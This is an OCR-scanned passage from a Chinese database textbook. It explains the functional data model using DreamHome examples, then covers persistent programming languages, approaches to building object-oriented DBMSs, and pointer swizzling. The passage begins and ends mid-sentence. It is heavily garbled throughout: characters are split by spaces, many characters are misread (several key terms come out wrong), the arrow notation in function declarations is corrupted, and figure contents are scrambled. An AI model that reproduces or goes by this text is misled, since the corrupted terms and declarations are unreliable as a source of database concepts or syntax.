型 ， 然 后 将 其 组 成 属性 分 别 声 明 为 该 实体 类 型 的 函数 联系 。 例 如 ， 我 们 可 以 这 样 声 明 Staff 
的 组 合 属性 Name: 

Namel() — ENTITY 

Name(Staff) 一 NAME 

fName(Name) 一 STRING 

IName(Name) — STRING 
联系 

带 有 参数 的 函数 不 仅 可 以 描述 实体 类 型 的 特性 (属性 )， 而 且 还 可 以 描述 实体 类 型 之 间 
的 联系 。 因 此 FDM 在 属性 和 联系 的 表示 上 没有 什么 区 别 。 每 一 个 联系 都 可 以 拥有 一 个 反 向 
定义 的 联系 。 例 如 ， 可 以 这 样 描述 一 对 多 的 联系 Staff Manages PropertyForRent: 

Manages(Staff 一 党 PropertyForRent 

ManagedBy(PropertyForRent) —S> Staff INVERSE OF Manages 

上 例 中 ， 双 箭头 用 以 表示 一 对 多 的 联系 。 这 种 符号 还 可 用 于 表示 多 值 属性 。 多 对 多 的 联 
系 可 以 用 双向 的 双 箭 头 表示 。 例 如 ， 可 以 这 样 定义 *.* 联系 Client Views PropertyForRent: 


Views(Client) -六 PropertyForRent 
ViewedBy(PropertyForRent) —S> Client INVERSE OF Views 


注意 , 一 个 实体 (实例 ) 是 某 种 形式 的 标志 ， 标 识 了 数据 库 中 某 个 独一无二 的 对 象 ， 通 
常 代表 了 “现实 世界 ”中 的 某 个 独一无二 的 对 象 。 另 外 ， 函 数 将 某 一 给 定 的 实体 映射 到 一 
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个 或 者 多 个 目标 实体 (例如 ， 函 数 Manages 将 某 一 Staff 实体 映射 到 一 组 PropertyForRent 实 
体 )。 因 此 ， 所 有 的 内 部 对 象 的 联系 都 是 与 其 相应 的 实体 实例 而 不 是 它们 的 名 字 或 者 关键 字 
相关 联 的 。 因 而 ， 与 关系 数据 模型 不 同 的 是 ， 引 用 完整 性 是 被 函数 数据 模型 隐 含 定义 的 部 
分 ， 不 需要 显 式 地 强制 实施 。 

FDM 还 支持 多 值 (mnulti-valued) 函数 。 例 如 ， 可 以 这 样 描述 前 面 提 到 的 联系 Vieus 的 
属性 ViewData: 

viewDate(Client, PropertyForRent) 一 DATE 


继承 与 路 径 表 达 式 

FDM 通过 实体 类 型 支持 继承 。 例 如 ， 函 数 Staff() 返回 一 组 staff 的 实体 ， 从 而 生成 了 
ENTITY 类 型 的 一 个 子 集 。 因 此 ， 实 体 类 型 Staff 就 是 实体 类 型 ENTITY 的 一 个 子 类 型 。 这 
种 子 类 型 / 超 类 型 的 联系 可 以 被 无 限制 地 扩展 。 就 像 期 望 的 那样 ， 子 类 型 继承 了 全 部 定义 在 其 
所 有 超 类 型 上 的 函数 。FDM 也 支持 可 替换 性 原则 ( 见 附录 K.6 )， 所 以 某 个 子 类 型 的 实例 也 是 
其 超 类 型 的 一 个 实例 。 例 如 ， 可 以 将 实体 类 型 Supervisor 声明 为 实体 类 型 Staff 的 一 个 子 类 型 ， 
如 下 所 示 : 

Staff() —» ENTITY 

Supervisor() — ENTITY 

IS-A-STAFF(Supervisor) 一 Staff 

FDM 允许 利用 多 个 函数 的 组 合 来 定义 导出 函数 。 因 此 ,我们 可 以 这 样 定义 下 列 导 出 函 
数 (注意 函数 名 被 重 载 ): 

fName(Staff) 一 fName(Name(Staff)) 

fName(Supervisor) 一 fName(IS-A-STAFF(Supervison) 

第 一 个 导出 函数 通过 计算 定义 右边 的 组 合 函 数 ， 返 回 了 一 组 职员 的 第 一 个 名 
字 。 紧 接着 ， 在 第 二 个 示例 中 ， 计 算 定 义 右 边 的 值 时 则 是 计算 的 fName(Name(IS-A- 
STAFF(Supervisor))) 这 个 组 合 函 数 的 值 。 这 种 合成 被 称 为 路 径 表 达 式 ( path expression)， 可 
能 用 点 符号 “.” 表 示 读 者 更 熟悉 一 些 : 

Supervisor.IS-A-STAFF.Name.fName 

图 27-3a 给 出 了 FDM 模式 的 DreamHome 样 例 研究 中 的 部 分 声明 ， 图 27-3b 则 给 出 了 
相应 的 图 形 化 表示 。 
函数 式 查询 语言 

路 径 表 达 式 也 可 用 于 函数 式 查询 语言 。 我 们 并 不 打算 深入 地 讨论 这 种 查询 语言 ， 感 兴 
趣 的 读者 请 参阅 本 节 最 后 引用 的 论文 。 实 际 上 ， 本 节 将 用 一 个 简单 的 例子 对 函数 式 查 询 语 言 
进行 说 明 。 例 如 ， 若 想 检 索 这 样 一 些 客户 的 姓 ， 他 们 都 察看 了 编号 为 SG14 的 员工 管理 的 房 
产 ， 则 可 以 这 样 写 : 

RETRIEVE IName(Name(ViewedBy(Manages(Staff)))) 

WHERE staffNo(Staff) = ‘SG14’ 


路 径 表 达 式 的 执行 顺序 是 由 里 向 外 ， 函 数 Manages( Staff) 返回 一 组 PropertyForRent 
实体 。 将 函数 ViewedBy 作用 于 这 组 结果 ， 返回 一 组 Client 实体 。 最 后 ， 执 行 函数 Name 和 
LName 将 返回 这 些 客户 的 姓 。 同 样 ， 与 之 等 价 的 点 符号 表示 也 许 更 加 清晰 一 些 : 


RETRIEVE Staff.Manages.ViewedBy.Name.IName 
WHERE Staff.staffNo = ‘SG14 
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第 七 部 分 


实体 类 型 声明 


Staff() -* ENTITY 
Supervisor() = ENTITY 


属性 声明 


fName(Name) — STRING 
IName(Name) — STRING 
fName(Staff) — fName(Name(Staff)) 
IName(Staff) 一 IName(Name(Staff)) 
fName(Client) = fName(Name(Client)) 
IName(Client) = IName(Name(Client)) 


对 用 DBMS 


PropertyForRent() ~ ENTITY 
Client() 一 ENTITY 


staffNo(Staff) 一 STRING 
position(Staff) 一 STRING 
sex(Staff) 一 CHAR 
salary(Staff) 一 REAL 
clientNo(Client) 一 STRING 
telNo(Client) =* STRING 


Name 一 ENTITY 


propertyNo(PropertyForRent) 一 STRING 
street(PropertyForRent) 一 STRING 
city(PropertyForRent) 一 STRING 
type(PropertyForRent) 一 STRING 
rooms(PropertyForRent) 一 INTEGER 
rent(PropertyForRent) 一 REAL 


prefTlype(Client) 一 STRING 
maxRent(Client) 一 REAL 


联系 类 型 声明 


Manages(Staff) —» PropertyForRent 
ManagedBy(PropertyForRent) 一 Staff INVERSE OF Manages 
Views(Client) —» PropertyForRent 
ViewedBy(PropertyForRent) —» Client INVERSE OF Views 
viewDate(Client, PropertyForRent) 一 DATE 
comments(Client, PropertyForRent) 一 STRING 


继承 声明 

IS-A-STAFF(Supervisor) 一 Staff 

staffNo(Supervisor) 一 staffNo(IS-A-STAFF(Supervisor)) 
fName(Supervisor) 一 fName(IS-A-STAFF(Supervisor)) 
IName(Supervisor) 一 IName(IS-A-STAFF(Supervison)) 
position(Supervisor) 一 position(IS-A-STAFF(Supervisor)) 
Sex(Supervisor) 一 sex(IS-A-STAFF(Supervisor)) 
salary(Supervisor) — salary(IS-A-STAFF(Supervisor)) 


a) DreamHome 样 例 研究 的 FDM 模 式 中 的 部 分 声明 















S_A_STAFF 





ManagedBy | |Manages 
clientNo 


maxRent 
propertyNo 


viewDate 
comments 


b ) 与 4 对 应 的 图 形 化 表示 
图 27-3 
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注意 ， 下 面 与 之 对 应 的 SQL 语句 则 需要 三 个 连接 操作 ， 并 且 不 如 FDM 的 语句 直观 : 
SELECT c.IName 
FROM Staff s, PropertyForRent p, Viewing v, Client c 
WHERE s.staffNo = p.staff No AND p.propertyNo = v.propertyNo AND 
v.clientNo = c.clientNo AND s.staffNo = SG14” 


优点 
FDM 的 优点 包括 : 
@ 支持 部 分 面向 对 象 的 概念 。FDM 能 够 支持 对 象 标识 ， 通 过 实体 类 的 层次 结构 支持 了 
继承 ， 还 支持 函数 名 的 重 载 和 导航 式 访问 。 
e 支持 引用 完整 性 。FDM 是 一 种 基于 实体 的 数据 模型 并 且 隐 含 地 支持 了 引用 完整 性 。 
e 不 可 旧 约 性 。FDM 只 由 少量 简单 的 概念 组 成 的 ， 这 些 概念 语义 地 表示 了 不 可 旧 约 的 
信息 单元 。 这 就 使 得 数据 库 模 式 能 比较 容易 地 用 图 形 方 式 描述 ， 因 此 也 就 简化 了 概 
念 数据 库 设计 。 
e 可 扩展 性 好 。 不 需要 修改 现 有 模式 对 象 的 情况 下 ， 就 可 以 实现 实体 类 和 函数 的 增 / 删 。 
e 适用 于 模式 集成 。FDM 的 概念 简单 意味 着 FDM 可 用 于 表示 多 种 不 同 的 数据 模型 ， 
包括 关系 的 、 网 状 的 、 层 次 的 和 面向 对 象 的 。 这 就 使 得 FDM 成 为 了 一 种 适用 于 
24.1.3 节 讨 论 过 的 多 数据 库 系统 (MDBS) 中 多 种 异 构 模 式 集成 的 模型 。 
@ 说 明 式 查询 语言 。 查 询 语言 是 说 明 式 的 ， 语 义 可 理解 性 强 (基于 入 演算 )。 这 就 使 
得 该 语言 易于 转换 和 优化 。 
人 们 提出 了 多 种 函数 数据 模型 和 语言 。 最 早 提 出 的 是 FQL (Buneman 和 Frankel，1979 ) 
和 DAPLEX ( Shipman，1981 )，DAPLEX 可 能 也 是 最 著名 的 函数 数据 模型 和 语言 。 这 些 函 
数 式 语 言 吸引 了 人 们 的 注意 ， 导 致 多 种 系统 被 开发 出 来 ， 例 如 GDM (Batory 等 人 ，1988 )、 
扩 展 的 FDM (Kulkarni 和 Atkinson，1986，1987 )、FDL (Poulovassilis 和 King，1990)、 
PFL (Poulovassilis 和 Small，1991) 和 P/FDM (Gray 等 人 ，1992)。 函 数 数据 语言 也 可 用 
于 非 函 数 的 数据 模型 ， 例如 PDM (Manola 和 Dayal，1986)、IPL (Annevelink，1991) 和 
LIFOO (Boucelma 和 Le Maitre，1991)。 在 下 一 节 ， 我 们 将 讨论 另 一 个 研究 领域 ， 该 领域 在 
OODBMS 的 发 展 历程 中 扮演 了 重要 的 角色 。 


27.2.3 ”持久 型 编程 语言 


在 开始 详细 分 析 OODBMS 之 前 ， 先 介绍 另外 一 个 令 人 感 兴趣 但 却 独立 于 OODBMS 发 
展 的 领域 ， 即 持久 型 编程 语言 。 
持久 型 编程 语言 | 一 种 允许 用 户 为 程序 的 后 续 执行 而 (透明 地 ) 保存 数据 ， 甚 至 允许 这 些 数 
据 被 多 个 不 同 的 程序 使 用 的 语言 。 
持久 型 编程 语言 中 的 数据 独立 于 任何 程序 ， 可 以 在 创建 它 的 代码 执行 之 外 和 生命 周期 之 
外 存在 。 最 初 ， 这 些 语言 并 未 打算 提供 完全 的 数据 库 功 能 ， 也 并 未 打算 提供 对 来 自 多 种 语言 
的 数据 的 访问 能 力 (Cattell，1994 )。 
| 数据 库 编 程 语言 | 是 一 种 将 数据 库 编程 模型 的 某 些 思 想 与 传统 的 编程 语言 特性 相 集成 的 语言 。 


比较 来 说 ， 数 据 库 编程 语言 与 持久 型 编程 语言 的 区 别 在 于 它 不 仅 具 有 持久 性 的 特性 ， 而 
且 还 集成 了 许多 其 他 的 特性 ， 例 如 事务 管理 、 并 发 控制 以 及 恢复 ( Bancilhon 和 Buneman， 
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1990 ) 。ISO SQL 标准 规定 SQL 可 以 被 嵌入 到 C、Fortran 、Pascal、COBOL 、Ada、MUMPS 
和 了 PL/1 等 编程 语言 中 使 用 。 通 信和 是 通过 一 组 宿主 语言 中 的 变量 完成 的 ， 一 个 特殊 的 预 处 理 
器 负责 修改 源 代 码 ， 将 其 中 的 SQL 语句 替换 为 对 DBMS 例 程 的 调用 。 然 后 ， 对 源 代码 用 常 
规 方式 进行 编译 和 链接 。 除 此 之 外 ， 也 可 以 提供 API， 这 样 就 去 除了 预 编译 的 过 程 。 尽 管 垦 
入 式 的 方法 比较 笨拙 ,但 它 还 是 有 用 且 必 要 的 ， 因 为 SQL2 标准 并 非 是 计算 完备 的 。 9 使 用 
两 种 不 同 语言 范例 的 问题 已 经 被 统称 为 应 用 程序 的 编程 语言 与 数据 库 查 询 语言 之 间 的 阻抗 失 
配 (参见 9.2 节 )。 据 称 ， 有 差不多 30% 的 编程 工作 和 代码 数量 都 被 用 来 将 数据 从 数据 库 格 
式 或 者 文件 格式 转换 为 程序 内 部 的 格式 ,或 者 用 于 相反 的 转换 ( Atkinson 等 人 ，1983 )。 将 
持久 性 集成 到 编程 语言 中 的 做 法 将 程序 员 从 这 个 任务 中 解脱 了 出 来 。 

从 事 持 久 型 编程 语言 开发 工作 的 研究 者 主要 致力 于 下 列 目标 (Morrison 等 人 ，1994 ): 

e 通过 简化 语义 提高 编程 效率 

e 去除 专门 的 数据 转化 和 长 期 的 数据 存储 机 制 

e 为 整体 环境 提供 保护 机 制 

持久 型 编程 语言 试图 通过 对 编程 语言 进行 扩展 ,使 其 具有 数据 库 的 能 力 ， 以 此 消除 阻抗 
失 配 问题 。 在 一 个 持久 型 编程 语言 中 ,语言 的 类 型 系统 提供 数据 模型 ， 该 模型 通常 包含 丰富 
的 结构 机 制 。 在 一 些 语言 中 ， 例 如 PS-algol 和 Napier88， 过 程 是 “一 阶 ” 对 象 ， 与 该 语言 中 
的 任何 其 他 的 数据 对 象 同 等 对 待 。 例 如 ， 过 程 是 可 赋值 的 ， 可 以 是 表达 式 、 其 他 过 程 或 程序 
块 的 结果 ， 也 可 以 是 构造 类 型 的 一 个 元 素 。 与 其 他 数据 对 象 相 比 ， 过 程 可 以 被 用 于 实现 抽象 
数据 类 型 。 从 持久 的 存储 中 导入 一 个 抽象 数据 类 型 并 将 其 动态 绑 定 到 程序 中 的 动作 ， 等 价 于 
传统 语言 中 的 模块 链接 。 

持久 型 编程 语言 的 第 二 个 重要 目标 是 维护 数据 表示 的 一 致 性 ， 即 应 用 程序 内 存 空间 中 的 
数据 表示 与 二 级 存储 器 的 持久 存储 中 的 数据 表示 相同 。 这 样 就 克服 了 在 两 种 表示 之 间 进 行 转 
换 的 困难 ， 减 少 了 开销 ， 详 见 27.3 节 。 

对 于 交互 式 开发 环境 来 说 ， 在 编程 语言 中 增加 (透明 的 ) 持久 性 是 一 个 重要 的 进步 ， 这 
两 种 范 型 的 集成 提供 了 增强 的 功能 和 语义 。 关 于 持久 型 编程 语言 的 研究 已 经 对 OODBMS 
的 开发 产生 了 重大 的 影响 ， 本 章 后 几 节 要 讨论 的 许多 问题 都 是 同时 适用 于 持久 型 编程 语言 
和 OODBMS 的 。 目 前 ,我 们 有 时 候 用 含义 更 加 广泛 的 术语 “持久 型 应 用 系统 ( Persistent 
Application System，PAS)” 代 替 “ 持 久 型 编程 语言 ”(Atkinson 和 Morrison，1995 )。 


27.2.4 开发 OODBMS 的 可 选 策略 


开发 OODBMS 有 几 种 不 同 的 方法 ， 可 以 归纳 如 下 (Khoshafian 和 Abnous，1990 ): 

@ 扩展 现 有 的 面向 对 象 编程 语言 使 其 具有 数据 库 的 功能 。 这 种 方法 将 传统 的 数据 库 功 
能 加 入 一 个 已 有 的 面向 对 象 的 编程 语言 中 ， 例 如 Smalltalk、C++ 或 者 Java (参见 
图 27-2 )。GemStone 就 是 采用 的 这 种 方法 ， 该 产品 扩展 了 以 上 三 种 语言 。 

@ 提供 可 扩展 的 面向 对 象 DBMS 库 。 这 种 方法 也 是 将 传统 的 数据 库 功 能 加 入 到 已 有 
的 面向 对 象 编程 语言 中 。 然 而 ， 该 方法 并 没有 对 语言 进行 扩展 ， 而 是 提供 了 类 库 
以 支持 持久 性 、 聚 集 、 数 据 类 型 、 事 务 、 并 发 、 安 全 等 。 这 是 Ontos 、Versant 和 
ObjectStore 所 采用 的 方法 。 我 们 将 在 28.3 节 讨 论 ObjectStore。 


日 SQL 标准 的 1999 版 ， 即 SQL: 1999， 增 加 了 一 些 使 其 计算 完备 的 内 容 。 一 一 原 书 注 
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@ 将 面向 对 象 的 数据 库 语言 结构 谋 入 到 传统 的 宿主 语言 中 。 在 附录 I， 我 们 讲述 了 如 何 

将 SQL 舱 入 到 一 个 传统 的 宿主 编程 语言 中 。 这 种 策略 应 用 了 相同 的 思想 ， 将 面向 对 

象 的 数据 库 语言 做 和 人 到 宿主 编程 语言 中 。 这 是 02 采用 的 方法 ，02 提供 了 对 于 编程 

语言 “C” 的 般 入 式 扩 展 。 

扩展 已 有 的 数据 库 语言 ， 使 其 具有 面向 对 象 的 功能 。 由 于 SQL 被 广泛 接受 ， 供 应 商 

正在 对 其 进行 扩展 ， 使 得 SQL 能 够 支持 面向 对 象 的 结构 。 这 种 方法 是 关系 DBMS 

和 OODBMS 的 供应 商 们 正在 实施 的 方法 。SQL 标准 的 1999 版 即 SQL:1999 支持 了 

面向 对 象 的 特性 。 并 且 ， 对 象 数 据 管理 组 (ODMG) 提出 的 对 象 数据 库 标准 制定 了 

Object SQL 的 规范 ， 我 们 将 在 28.2.4 节 讨 论 。Ontos 和 Versant 提供 了 Object SQL 

的 一 个 版 本 ， 而 大 部 分 OODBMS 供应 商 则 会 遵照 ODMG 的 标准 。 

@ 开发 一 种 全 新 的 数据 库 数 据 模型 /数据 语言 。 这 是 一 种 比较 激进 的 方法 ， 一 切 从 
头 开始 ， 开 发 一 种 全 新 的 数据 库 语 言 和 具有 面向 对 象 功 能 的 DBMS。 这 是 SIM 
(Semantic Information Manager， 语 义 信息 管理 器 ) 所 采用 的 方法 ，SIM 是 基于 语义 
数据 模型 的 ， 支 持 一 种 新 的 DML/DDL (Jagannathan 等 人 ，1988 ) 。 


27.3 OODBMS 的 持久 性 


DBMS 主要 关注 大 型 的 、 长 生存 期 的 数据 集 的 创建 和 维护 。 正 如 我 们 在 前 面 章 节 中 已 经 
看 到 的 ， 现 代 DBMS 可 按 其 对 下 列 特性 的 支持 程度 来 刻画 : 

e 数据 模型 : 具体 描述 数据 、 数 据 之 间 的 联系 以 及 数据 上 的 约束 的 一 种 方式 。 

e 数据 持久 性 : 数据 在 程序 执行 完毕 以 后 还 能 存在 、 甚 至 可 能 在 程序 自身 的 生命 周期 
之 外 依然 能 够 存在 的 能 力 。 
数据 共享 : 多 个 应 用 程序 (或 同一 个 应 用 程序 的 多 个 实例 ) 访问 公共 的 数据 、 甚 至 可 
以 同时 访问 数据 的 能 力 。 
e 可 靠 性 : 保证 数据 库 中 的 数据 不 受 硬 件 和 软件 故障 的 影响 。 
可 伸缩 性 : 能 够 用 简单 的 方式 操作 大 规模 数据 的 能 力 。 
安全 性 和 完整 性 : 保护 数据 不 被 未 授权 者 访问 ， 保 证 数据 符合 已 制定 的 正确 性 规则 
和 一 致 性 规则 。 
分 布 : 在 计算 机 网 络 上 物理 地 分 布 那 些 逻 辑 上 相互 关联 的 可 共享 的 数据 集合 、 并 尽 
可 能 地 使 得 这 种 分 布 对 用 户 透 明 的 能 力 。 

比较 而 言 ， 传 统 的 程序 设计 语言 尽管 提供 了 过 程控 制 以 及 数据 和 函数 抽象 的 机 制 ， 
但 是 却 缺 乏 对 上 述 许多 数据 库 特 性 的 内 在 支持 。 虽 然 DBMS 和 程序 设计 语言 在 各 自 的 领 
域 都 大 有 作为 ， 但 是 出 现 了 越 来 越 多 的 应 用 ， 它 们 既 需 要 DBMS 的 功能 ， 也 需要 编程 语 
言 的 功能 。 正 如 9.1 节 所 述 ， 这 类 应 用 的 特点 是 要 求 对 大 量 共享 的 、 结 构 化 的 数据 进行 
存储 和 检索 。 自 1980 年 以 来 ， 人 们 投入 了 大 量 的 努力 ， 试 图 开发 能 够 将 这 两 个 领域 的 概 
念 相 结合 的 系统 。 然 而 ， 必 须要 考虑 到 这 两 个 领域 还 是 存在 着 稍微 不 同 的 视角 和 已 讨论 
过 的 差别 。 

从 程序 员 的 角度 来 看 ， 最 关心 的 两 个 问题 可 能 就 是 性 能 和 易 用 性 ， 而 这 两 者 都 可 以 通 
过 较 之 传统 DBMS 更 加 无 颖 地 集成 编程 语言 与 DBMS 来 实现 。 关 于 传统 的 DBMS ， 我 们 
发 现 : 

e 程序 员 要 负责 决定 什么 时 候 读 取 和 更 新 对 象 (记录 )。 
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e 程序 员 必 须 书写 代码 ， 实 现 应 用 程序 的 对 象 模型 与 DBMS 的 数据 模型 (例如 ， 关 系 
数据 模型 ) 之 间 的 转换 ， 因 为 这 两 者 之 间 可 能 存在 着 很 大 的 不 同 。 若 所 用 面向 对 象 程 
序 设 计 语 言 允 许 一 个 对 象 包 含 由 许多 指针 表示 的 子 对 象 ， 这 种 转换 可 能 会 尤其 复杂 。 
前 面 已 经 提 到 ， 有 调查 称 有 多 达 30% 的 编程 工作 和 代码 量 都 用 在 了 这 类 映射 上 。 如 
果 这 种 映射 过 程 能 够 被 消除 ， 或 者 至 少 能 够 被 减 小 ， 程 序 员 就 可 以 从 这 种 工作 中 解 
脱出 来 ,最 终 的 代码 可 能 更 易于 理解 和 维护 ， 性 能 还 可 能 因此 而 得 到 提高 。 
e 当 从 数据 库 中 读 取 对 象 的 时 候 ， 进 行 类 型 检查 是 程序 员 的 责任 。 例 如 ， 程 序 员 可 以 
用 强 类 型 的 面向 对 象 语言 Java 创建 一 个 对 象 ， 并 将 其 存储 到 传统 的 DBMS 中 。 然 
而 ， 另 外 一 个 使 用 不 同 语言 编写 的 应 用 程序 可 能 会 修改 这 个 对 象 ， 因 此 无 法 确保 该 
对 象 的 类 型 与 其 原始 类 型 保持 一 致 。 
这 些 困难 源 于 传统 的 DBMS 采用 两 级 存储 模型 : 内 存 或 虚 存 中 的 应 用 程序 存储 模型 和 
磁盘 上 的 数据 库存 储 模 型 ， 如 图 27-4 所 示 。 而 OODBMS 则 试图 使 用 一 种 单 级 存储 模型 ， 
即 内 存 和 磁盘 上 的 数据 库 具 有 类 似 的 表示 ， 如 图 27-5 所 示 。 


ve 主 存 或 虚 存 





二 级 存储 二 级 存储 





图 27-4 传统 (关系 ) DBMS 的 二 级 存储 模型 图 27-5 OODBMS 的 单 级 存储 模型 


尽管 单 级 存储 模型 直观 上 比较 简单 ， 但 是 为 了 实现 这 样 一 个 幻象 ，OODBMS 必须 灵活 
地 管理 对 象 在 内 存 和 磁盘 上 的 表示 。 在 9.3 节 曾 讨论 过 ， 对 象 以 及 对 象 之 间 的 联系 是 通过 对 
象 标识 符 (OID) 进行 识别 的 。 有 两 种 类 型 的 OID: 

e 逻辑 OID， 独 立 于 对 象 在 磁盘 上 的 物理 位 置 。 

e 物理 OID， 是 对 象 在 磁盘 上 物理 位 置 的 编码 。 

在 前 一 种 情况 下 ， 需 要 一 次 间接 寻 址 来 查找 磁盘 上 对 象 的 物理 地 址 。 然 而 ， 无 论 哪 种 情 
况 ，OID 的 大 小 与 标准 内 存 指针 的 大 小 是 不 同 的 ， 标 准 内 存 指针 只 需要 大 到 足以 对 所 有 的 虚 
存单 元 寻 址 就 可 以 了 。 因 此 ， 为 了 达到 所 需 的 性 能 ，OODBMS 必须 能 够 在 OID 与 内 存 指针 
之 间 进 行 转换 。 这 种 转换 技术 就 是 常 说 的 指针 切换 (pointer swizzling) 或 者 对 象 失 效 (object 
faulting)， 实 现 这 种 技术 的 方法 各 有 不 同 ， 有 基于 软件 的 位 置 检 查 ， 也 有 由 底层 硬件 实现 的 
页 面 失效 模式 (Moss 和 Eliot，1990 )， 下 面 分 别 进行 讨论 。 


27.3.1 指针 切换 技术 


| 指针 切换 | 将 对 象 标识 符 转 换 为 内 存 指针 或 者 将 内 存 指 针 转 换 回 对 象 标识 符 的 动作 。 


指针 切换 的 目的 是 为 了 优化 对 象 访问 。 就 像 我 们 刚刚 讲 到 的 ， 对 象 之 间 的 引用 通常 是 用 
OID 表示 的 。 如 果 要 将 某 个 对 象 从 二 级 存储 器 读 取 到 页 缓冲 区 中 ， 则 应 该 能 够 通过 该 对 象 的 
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OID 在 二 级 存储 器 中 定位 被 访问 的 对 象 。 然 而 ,一 旦 这 些 被 访问 的 对 象 读 入 缓存 后 ， 则 要 记 
录 这 些 对 象 已 在 内 存 ， 避 免 再次 从 二 级 存储 器 检索 它们 。 一 种 方法 是 维护 一 个 将 OID 映射 
为 内 存 指针 的 查找 (lookup) 表 。 可 以 合理 有 效 地 利用 散 列 技术 实现 查找 表 ， 但 与 指针 的 间 
接 引用 相 比 效率 太 低 ， 尤 其 是 在 对 象 已 经 位 于 内 存 的 情况 下 。 然 而 ， 指 针 切 换 试 图 提供 一 种 
更 加 高 效 的 策略 ， 即 在 被 访问 对 象 的 OID 位 置 上 存储 内 存 指针 ， 而 当 对 象 要 被 写 回 磁盘 的 
时 候 再 反 过 来 操作 。 

本 节 主 要 围绕 指针 切换 的 问题 进行 讨论 ， 包 括 各 种 可 用 的 技术 。 
无 切换 

最 早 实 现 失效 对 象 进出 内 存 的 方法 是 不 进行 任何 切换 。 在 这 种 情况 下 ， 失 效 对 象 由 底层 
的 对 象 管理 器 读 人 和 人 内存， 并 给 应 用 程序 传 回 一 个 包含 了 该 对 象 OID 的 句柄 ( White，1994 ) 。 
每 一 次 对 象 被 访问 时 都 要 使 用 该 OID。 这 就 要 求 系统 维护 某 种 查找 表 ， 以 找到 对 象 的 虚 存 指 
针 ， 然 后 再 用 该 指针 访问 这 个 对 象 。 因 为 每 一 次 对 象 访问 都 需要 进行 一 次 查找 ， 如 果 一 些 对 
象 被 重复 访问 ， 则 这 种 方法 的 效率 就 会 变 得 很 低 。 另 一 方面 ， 如 果 应 用 程序 对 一 个 对 象 只 访 
问 一 次 ， 那 么 这 还 是 一 种 可 以 接受 的 方法 。 

图 27-6 的 查找 表 显 示 了 从 二 级 存储 器 读 取 了 四 个 对 象 以 后 的 情况 ， 有 时 也 称 查找 表 为 
驻 内 对 象 表 ( Resident Object Table，ROT)。 如 果 希 望 经 由 Branch 的 对 象 OID1 访问 对 象 标 
识 符 为 OID5 的 Staff 对 象 ， 对 ROT 表 的 查找 表明 该 对 象 不 在 主 存 ， 需 要 从 二 级 存储 器 读 取 
该 对 象 ， 并 将 其 内 存 地 址 记 入 ROT 表 。 另 外 ， 如 果 想 要 经 由 Branch 对 象 访问 对 象 标 识 符 为 





图 27-6 涉及 位 于 内 存 的 四 个 对 象 的 驻 内 对 象 表 


Moss 提出 了 一 种 分 析 模 型 ， 用 以 评估 在 什么 情况 下 使 用 切换 技术 是 合适 的 (1990 )。 
最 后 的 研究 结果 建议 ， 如 果 对 象 经 常会 被 交换 出 内 存 ， 或 者 引用 次 数 并 未 达到 最 低 的 平 
均 次 数 ， 则 应 用 程序 最 好 使 用 有 效 的 映射 表 方 法 ， 将 OID 映射 为 对 象 内 存 地 址 (类 似 于 
Objectivity/DB 中 采用 的 方法 )， 而 不 要 使 用 切换 技术 。 
对 象 引 用 

为 了 将 持久 对 象 的 OID 切换 为 虚 存 指针 ， 需 要 有 一 种 能 够 分 辨 驻 内 和 非 驻 内 对 象 的 机 
制 。 解 决 这 一 问题 的 大 多 数 技术 不 是 边 标记 (edge marking) 就 是 结 点 标记 ( node marking) 
技术 的 变种 (Hoskings 和 Moss，1993 ) 。 
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将 虚 存 看 作 这 样 一 张 有 向 图 ， 对 象 为 结 点 ， 引 用 为 有 向 边 ， 边 标记 上 用 一 个 标志 位 
标记 对 象 指针 。 如 果 这 个 标志 位 被 置 为 1， 则 表示 引用 指向 一 个 虚 存 指针 ， 否 则 引用 仍 
然 为 对 象 OID 并 且 当 该 对 象 被 失效 读 取 到 应 用 程序 的 内 存 空 间 时 需要 进行 切换 。 而 结 点 标 
记 法 要 求 ， 当 一 个 对 象 失效 读 取 到 内 存 时 ， 所 有 对 其 的 引用 都 被 立即 转换 为 虚 存 指针 。 第 
一 种 方法 是 基于 软件 的 技术 ， 而 第 二 种 方法 既 可 以 用 软件 技术 实现 ， 也 可 以 用 硬件 技术 
实现 。 

在 前 例 中 ， 当 Staff 对 象 OID4 被 读 和 内存 时 ， 系 统 将 用 OID4 的 内 存 地 址 替换 掉 
Branch 对 象 OID1 中 OID4 的 值 。 该 内 存 地 址 提供 一 个 指针 ， 指 向 标识 符 为 OID4 的 Staff 对 
象 的 内 存 位 置 。 因 此 从 Branch 对 象 OID1 移动 到 对 象 OID4 的 并 不 会 带 来 查看 整 张 ROT 表 
的 开销 ， 而 仅 包括 了 一 个 指针 间接 引用 操作 的 开销 。 
基于 硬件 的 方法 

基于 硬件 的 切换 技术 使 用 虚 存 访问 保护 系统 来 检测 对 非 驻 内 对 象 的 访问 (Lamb 等 人 ， 
1991 )。 这 些 方案 使 用 标准 的 虚 存 硬件 触发 持久 数据 从 磁盘 到 内 存 的 传送 。 一 旦 某 页 失效 读 
和 人 入， 该 页 上 的 对 象 将 会 通过 标准 的 虚 存 指针 进行 访问 ， 而 不 需要 进行 对 象 驻 内 检查 。 硬 件 方 
法 已 经 被 一 些 商 业 和 研究 系统 使 用 ， 包 括 ObjectStore 和 Texas (Singhal 等 人 ，1992 )。 

基于 硬件 方法 的 主要 优点 是 ， 访 问 驻 内 存 的 持久 对 象 与 访问 临时 对 象 一 样 有 效 ， 因 为 硬 
件 方 法 避免 了 软件 方法 所 需 的 驻 内 检查 的 成 本 。 基 于 硬件 方法 的 一 个 缺点 是 ， 它 使 得 对 许多 
有 用 的 数据 库 功 能 的 支持 变 得 困难 ， 例 如 细 粒 度 锁 、 引 用 完整 性 、 恢 复 和 灵活 的 缓冲 区 管理 
策略 等 。 并 且 ， 硬 件 方法 使 得 在 一 个 事务 中 可 以 被 访问 的 数据 量 受到 虚 存 空间 大 小 的 限制 。 
这 种 限制 可 以 通过 使 用 某 种 形式 的 垃圾 回收 机 制 回收 内 存 空间 来 解决 ， 尽 管 这 可 能 增加 系统 
的 开销 和 复杂 度 。 
指针 切换 的 分 类 

指针 切换 技术 可 以 根据 下 列 三 个 标准 进行 分 类 : 

(1) 复制 切换 与 就 地 切换 。 

(2 ) 积极 切换 与 懒惰 切换 。 

(3 ) 直接 切换 与 间接 切换 。 
复制 切换 与 就 地 切换 

当 读 入 失效 对 象 时 ， 数 据 可 以 被 复制 到 应 用 程序 的 局 部 对 象 缓冲 区 ， 或 者 就 在 对 象 管理 
器 的 数据 库 缓 冲 区 中 被 访问 (White，1994 ) 。 就 像 22.3.4 节 讨 论 的 那样 ， 从 二 级 存储 器 到 
